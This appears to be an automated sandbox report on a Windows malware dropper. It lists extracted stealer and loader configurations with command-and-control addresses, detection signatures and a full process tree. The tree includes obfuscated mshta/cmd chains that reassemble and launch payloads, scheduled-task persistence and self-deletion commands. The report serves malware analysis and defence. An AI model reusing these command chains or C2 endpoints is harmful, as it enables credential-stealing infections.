Analysis

  • max time kernel
    81s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    22/11/2021, 12:51

General

  • Target

    d9552a15a61f255df3206b63ee0383be.exe

  • Size

    554KB

  • MD5

    d9552a15a61f255df3206b63ee0383be

  • SHA1

    7c76e2edcf184b90d40003dac71b08e3a3ed2e8c

  • SHA256

    0cdd906491990c6ba9c24bdd60172057587859a8e649ba7f4b51fece9a0fdac6

  • SHA512

    0ce1db824d226df28177b6e5394fa1f8483333583d8332680d4cf0cfc8627a53d69c1c857b319dd200e0f38bf88d445a4289d78472fe3167cc39ae6a85f21599

Malware Config

Extracted

Family

socelars

C2

http://www.gianninidesign.com/

Extracted

Family

redline

C2

185.92.73.160:46771

Extracted

Family

redline

Botnet

13

C2

136.144.41.178:9295

Extracted

Family

redline

Botnet

TestBest1

C2

188.227.87.7:10234

Extracted

Family

smokeloader

Version

2020

C2

http://membro.at/upload/

http://jeevanpunetha.com/upload/

http://misipu.cn/upload/

http://zavodooo.ru/upload/

http://targiko.ru/upload/

http://vues3d.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

48.6

Botnet

937

C2

https://mastodon.online/@valhalla

https://koyu.space/@valhalla

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

udptest

C2

193.56.146.64:65441

Extracted

Family

redline

Botnet

Ruzki 3k

C2

185.244.181.71:2119

Extracted

Family

redline

Botnet

ignation

C2

37.9.13.169:63912

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Vidar Stealer 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 25 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d9552a15a61f255df3206b63ee0383be.exe
    "C:\Users\Admin\AppData\Local\Temp\d9552a15a61f255df3206b63ee0383be.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2468
    • C:\Users\Admin\Pictures\Adobe Films\gHpwhoCGxUWsmql8C5nAlwbs.exe
      "C:\Users\Admin\Pictures\Adobe Films\gHpwhoCGxUWsmql8C5nAlwbs.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:956
    • C:\Users\Admin\Pictures\Adobe Films\XNZwpkTvIAOD78FTHWKpQF_u.exe
      "C:\Users\Admin\Pictures\Adobe Films\XNZwpkTvIAOD78FTHWKpQF_u.exe"
      2⤵
      • Executes dropped EXE
      PID:680
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 400
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:708
    • C:\Users\Admin\Pictures\Adobe Films\_VjiwHbtuy37_JPzF6IcOdvI.exe
      "C:\Users\Admin\Pictures\Adobe Films\_VjiwHbtuy37_JPzF6IcOdvI.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:724
    • C:\Users\Admin\Pictures\Adobe Films\Ys9xONIZ2zMkfdltG8YIwyLI.exe
      "C:\Users\Admin\Pictures\Adobe Films\Ys9xONIZ2zMkfdltG8YIwyLI.exe"
      2⤵
      • Executes dropped EXE
      PID:1320
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 400
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:656
    • C:\Users\Admin\Pictures\Adobe Films\IIEJIZY_SZgssVHr8AKAwUN9.exe
      "C:\Users\Admin\Pictures\Adobe Films\IIEJIZY_SZgssVHr8AKAwUN9.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2592
    • C:\Users\Admin\Pictures\Adobe Films\VH7kbYzRqJXJ_EUcJHqV5bPa.exe
      "C:\Users\Admin\Pictures\Adobe Films\VH7kbYzRqJXJ_EUcJHqV5bPa.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1736
    • C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe
      "C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"
      2⤵
      • Executes dropped EXE
      PID:2880
      • C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe
        "C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"
        3⤵
          PID:1728
        • C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe
          "C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"
          3⤵
            PID:2272
          • C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe
            "C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"
            3⤵
              PID:3444
            • C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe
              "C:\Users\Admin\Pictures\Adobe Films\MA4HOG6zBLtW4CknflfVfoVb.exe"
              3⤵
                PID:4180
            • C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe
              "C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"
              2⤵
              • Executes dropped EXE
              PID:1440
              • C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe
                "C:\Users\Admin\Pictures\Adobe Films\OGpflBgSHNuzxrPxFfnnscqW.exe"
                3⤵
                  PID:3736
              • C:\Users\Admin\Pictures\Adobe Films\NJLZolJE37X_FqtXQ3EqKJkr.exe
                "C:\Users\Admin\Pictures\Adobe Films\NJLZolJE37X_FqtXQ3EqKJkr.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:3764
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im chrome.exe
                  3⤵
                    PID:4488
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      4⤵
                      • Kills process with taskkill
                      PID:5060
                • C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe
                  "C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:3704
                  • C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe
                    "C:\Users\Admin\Pictures\Adobe Films\kDj8E7Fct6tGctK6mmenGu9x.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:700
                • C:\Users\Admin\Pictures\Adobe Films\obEL72OIYFiysJSfwnbvSnkT.exe
                  "C:\Users\Admin\Pictures\Adobe Films\obEL72OIYFiysJSfwnbvSnkT.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:3300
                • C:\Users\Admin\Pictures\Adobe Films\O6FR10TQUM5bpSSUN_mhgVfA.exe
                  "C:\Users\Admin\Pictures\Adobe Films\O6FR10TQUM5bpSSUN_mhgVfA.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:1296
                  • C:\Users\Admin\Documents\4RQU_GVOsbXT3T7wBls4cB0K.exe
                    "C:\Users\Admin\Documents\4RQU_GVOsbXT3T7wBls4cB0K.exe"
                    3⤵
                      PID:1080
                      • C:\Users\Admin\Pictures\Adobe Films\V3GCH1dCM4JtyOdD1UWZ2_tC.exe
                        "C:\Users\Admin\Pictures\Adobe Films\V3GCH1dCM4JtyOdD1UWZ2_tC.exe"
                        4⤵
                          PID:4896
                        • C:\Users\Admin\Pictures\Adobe Films\8tmxLhzOeaMFxSozv75GAV3L.exe
                          "C:\Users\Admin\Pictures\Adobe Films\8tmxLhzOeaMFxSozv75GAV3L.exe"
                          4⤵
                            PID:4488
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 652
                              5⤵
                              • Program crash
                              PID:2772
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 664
                              5⤵
                              • Program crash
                              PID:5340
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 768
                              5⤵
                              • Program crash
                              PID:2452
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 804
                              5⤵
                              • Program crash
                              PID:6124
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 800
                              5⤵
                              • Program crash
                              PID:5420
                          • C:\Users\Admin\Pictures\Adobe Films\a5NwEe3wwV5amklomjrghoSt.exe
                            "C:\Users\Admin\Pictures\Adobe Films\a5NwEe3wwV5amklomjrghoSt.exe"
                            4⤵
                              PID:3600
                            • C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe
                              "C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe"
                              4⤵
                                PID:3164
                                • C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\2tBcc64fyJlFwBjW4Mn2cZqY.exe" -u
                                  5⤵
                                    PID:5520
                                • C:\Users\Admin\Pictures\Adobe Films\VfAVvtPyxS7Gw3Zz73JPqETV.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\VfAVvtPyxS7Gw3Zz73JPqETV.exe"
                                  4⤵
                                    PID:5296
                                  • C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe"
                                    4⤵
                                      PID:3164
                                      • C:\Users\Admin\AppData\Local\Temp\is-NCSP8.tmp\x1zrysQfONa2jaIoWwX6oB6d.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-NCSP8.tmp\x1zrysQfONa2jaIoWwX6oB6d.tmp" /SL5="$3030E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\x1zrysQfONa2jaIoWwX6oB6d.exe"
                                        5⤵
                                          PID:5620
                                          • C:\Users\Admin\AppData\Local\Temp\is-VBKB9.tmp\lakazet.exe
                                            "C:\Users\Admin\AppData\Local\Temp\is-VBKB9.tmp\lakazet.exe" /S /UID=2709
                                            6⤵
                                              PID:5292
                                              • C:\Users\Admin\AppData\Local\Temp\59-5b5fe-bb3-a5b88-7716379af7b28\Nogaguhyka.exe
                                                "C:\Users\Admin\AppData\Local\Temp\59-5b5fe-bb3-a5b88-7716379af7b28\Nogaguhyka.exe"
                                                7⤵
                                                  PID:4884
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive & exit
                                                    8⤵
                                                      PID:7244
                                                      • C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe
                                                        C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive
                                                        9⤵
                                                          PID:7384
                                                          • C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe
                                                            C:\Users\Admin\AppData\Local\Temp\t35jhgl2.0rd\GcleanerEU.exe /eufive
                                                            10⤵
                                                              PID:7436
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe /silent /subid=798 & exit
                                                          8⤵
                                                            PID:6064
                                                            • C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe
                                                              C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe /silent /subid=798
                                                              9⤵
                                                                PID:3816
                                                                • C:\Users\Admin\AppData\Local\Temp\is-8GNNV.tmp\vpn.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-8GNNV.tmp\vpn.tmp" /SL5="$10398,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ficdmchq.51v\vpn.exe" /silent /subid=798
                                                                  10⤵
                                                                    PID:6168
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                      11⤵
                                                                        PID:3684
                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                          tapinstall.exe remove tap0901
                                                                          12⤵
                                                                            PID:6252
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exe /qn CAMPAIGN="654" & exit
                                                                    8⤵
                                                                      PID:2196
                                                                      • C:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\lyrm0uek.ynv\installer.exe /qn CAMPAIGN="654"
                                                                        9⤵
                                                                          PID:6412
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe & exit
                                                                        8⤵
                                                                          PID:6324
                                                                          • C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe
                                                                            9⤵
                                                                              PID:4656
                                                                              • C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\zga0ceq3.hcf\any.exe" -u
                                                                                10⤵
                                                                                  PID:8036
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exe & exit
                                                                              8⤵
                                                                                PID:7580
                                                                                • C:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\5yiqskcd.eum\rtst1045.exe
                                                                                  9⤵
                                                                                    PID:4784
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive & exit
                                                                                  8⤵
                                                                                    PID:4284
                                                                                    • C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive
                                                                                      9⤵
                                                                                        PID:7112
                                                                                        • C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\hraeb1kw.3o3\gcleaner.exe /mixfive
                                                                                          10⤵
                                                                                            PID:5292
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exe /S & exit
                                                                                        8⤵
                                                                                          PID:6220
                                                                                          • C:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\tjixuxef.vv4\autosubplayer.exe /S
                                                                                            9⤵
                                                                                              PID:3328
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh9FC3.tmp\tempfile.ps1"
                                                                                                10⤵
                                                                                                  PID:7092
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exe /qn CAMPAIGN=654 & exit
                                                                                              8⤵
                                                                                                PID:7588
                                                                                                • C:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\zfd4m0cb.bl0\installer.exe /qn CAMPAIGN=654
                                                                                                  9⤵
                                                                                                    PID:7920
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\yHUOwrYtcItGUXoLYS8taBHy.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\yHUOwrYtcItGUXoLYS8taBHy.exe"
                                                                                          4⤵
                                                                                            PID:5672
                                                                                            • C:\Users\Admin\AppData\Roaming\Traffic\setup.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Traffic\setup.exe -cid= -sid= -silent=1
                                                                                              5⤵
                                                                                                PID:7460
                                                                                                • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" "--KGyYl1v"
                                                                                                  6⤵
                                                                                                    PID:7848
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:1728
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                              3⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:4024
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\WVrSv9ymnNaFCHZ1OhI4PXZh.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\WVrSv9ymnNaFCHZ1OhI4PXZh.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks SCSI registry key(s)
                                                                                            PID:1280
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\mXxK5JogboFNja5c52jC2vWc.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\mXxK5JogboFNja5c52jC2vWc.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1740
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 660
                                                                                              3⤵
                                                                                              • Program crash
                                                                                              PID:4612
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 676
                                                                                              3⤵
                                                                                              • Program crash
                                                                                              PID:4936
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 680
                                                                                              3⤵
                                                                                              • Program crash
                                                                                              PID:5100
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 692
                                                                                              3⤵
                                                                                              • Program crash
                                                                                              PID:4172
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 752
                                                                                              3⤵
                                                                                              • Program crash
                                                                                              PID:3612
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2052
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im NDd0Pa2E0Rb0cZgDOhr9UELU.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\NDd0Pa2E0Rb0cZgDOhr9UELU.exe" & del C:\ProgramData\*.dll & exit
                                                                                              3⤵
                                                                                                PID:2208
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /im NDd0Pa2E0Rb0cZgDOhr9UELU.exe /f
                                                                                                  4⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:4060
                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                  timeout /t 6
                                                                                                  4⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:3064
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\mnFuOqYf8WL71_aC7nZIaRZs.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\mnFuOqYf8WL71_aC7nZIaRZs.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in Program Files directory
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2340
                                                                                              • C:\Program Files (x86)\Company\NewProduct\rtst1039.exe
                                                                                                "C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3508
                                                                                              • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                                                                                "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3388
                                                                                              • C:\Program Files (x86)\Company\NewProduct\inst2.exe
                                                                                                "C:\Program Files (x86)\Company\NewProduct\inst2.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3108
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\SxsxiDh19G4M6ZMjAAn63qOK.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\SxsxiDh19G4M6ZMjAAn63qOK.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2888
                                                                                              • C:\Users\Admin\AppData\Roaming\2045521.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\2045521.exe"
                                                                                                3⤵
                                                                                                  PID:4048
                                                                                                • C:\Users\Admin\AppData\Roaming\7310357.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\7310357.exe"
                                                                                                  3⤵
                                                                                                    PID:1520
                                                                                                    • C:\Users\Admin\AppData\Roaming\3889124\38881633888163.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\3889124\38881633888163.exe"
                                                                                                      4⤵
                                                                                                        PID:4716
                                                                                                    • C:\Users\Admin\AppData\Roaming\4682617.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\4682617.exe"
                                                                                                      3⤵
                                                                                                        PID:4216
                                                                                                      • C:\Users\Admin\AppData\Roaming\4183110.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\4183110.exe"
                                                                                                        3⤵
                                                                                                          PID:4376
                                                                                                        • C:\Users\Admin\AppData\Roaming\4340187.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\4340187.exe"
                                                                                                          3⤵
                                                                                                            PID:4428
                                                                                                            • C:\Users\Admin\AppData\Roaming\8115156.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\8115156.exe"
                                                                                                              4⤵
                                                                                                                PID:3168
                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                  "C:\Windows\System32\mshta.exe" VBscRIpt: clOSe ( cReAteOBJecT ( "WSCRIpT.shELl"). rUN ( "CmD.EXe /Q /c CoPy /Y ""C:\Users\Admin\AppData\Roaming\8115156.exe"" 96I39AZEjeY.eXe && sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If """" == """" for %J IN ( ""C:\Users\Admin\AppData\Roaming\8115156.exe"" ) do taskkill /f /iM ""%~nxJ"" " , 0 ,tRUe ) )
                                                                                                                  5⤵
                                                                                                                    PID:4784
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /c CoPy /Y "C:\Users\Admin\AppData\Roaming\8115156.exe" 96I39AZEjeY.eXe &&sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If "" == "" for %J IN ( "C:\Users\Admin\AppData\Roaming\8115156.exe" ) do taskkill /f /iM "%~nxJ"
                                                                                                                      6⤵
                                                                                                                        PID:5056
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe
                                                                                                                          96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8
                                                                                                                          7⤵
                                                                                                                            PID:4172
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" VBscRIpt: clOSe ( cReAteOBJecT ( "WSCRIpT.shELl"). rUN ( "CmD.EXe /Q /c CoPy /Y ""C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe"" 96I39AZEjeY.eXe && sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If ""/pHUW_5J4~bwUgHE59AL0C8 "" == """" for %J IN ( ""C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe"" ) do taskkill /f /iM ""%~nxJ"" " , 0 ,tRUe ) )
                                                                                                                              8⤵
                                                                                                                                PID:5228
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /c CoPy /Y "C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe" 96I39AZEjeY.eXe &&sTart 96I39AZEJeY.eXe /pHUW_5J4~bwUgHE59AL0C8 & If "/pHUW_5J4~bwUgHE59AL0C8 " == "" for %J IN ( "C:\Users\Admin\AppData\Local\Temp\96I39AZEjeY.eXe" ) do taskkill /f /iM "%~nxJ"
                                                                                                                                  9⤵
                                                                                                                                    PID:5448
                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                  "C:\Windows\System32\mshta.exe" VbSCRiPt: ClOSE ( CreATEobJeCt ( "WScRipT.sHELL" ). run ( "CMD /Q /C ECHo | Set /P = ""MZ"" > sGRrCYU.nK0& CoPY /Y /b SGRrCYU.nK0 + 8IocY82.AK + QsN7PDR.gG + 4BRi.S xW5LDH.~rl & dEL 8IocY82.AK qSN7PdR.gg 4BRi.s sGRrCYU.nK0&sTart msiexec -Y .\Xw5LDH.~Rl " ,0 , tRUE ) )
                                                                                                                                  8⤵
                                                                                                                                    PID:5304
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C ECHo | Set /P = "MZ" > sGRrCYU.nK0& CoPY /Y /b SGRrCYU.nK0 + 8IocY82.AK + QsN7PDR.gG + 4BRi.S xW5LDH.~rl & dEL 8IocY82.AK qSN7PdR.gg 4BRi.s sGRrCYU.nK0&sTart msiexec -Y .\Xw5LDH.~Rl
                                                                                                                                      9⤵
                                                                                                                                        PID:5496
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" ECHo "
                                                                                                                                          10⤵
                                                                                                                                            PID:5468
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>sGRrCYU.nK0"
                                                                                                                                            10⤵
                                                                                                                                              PID:5660
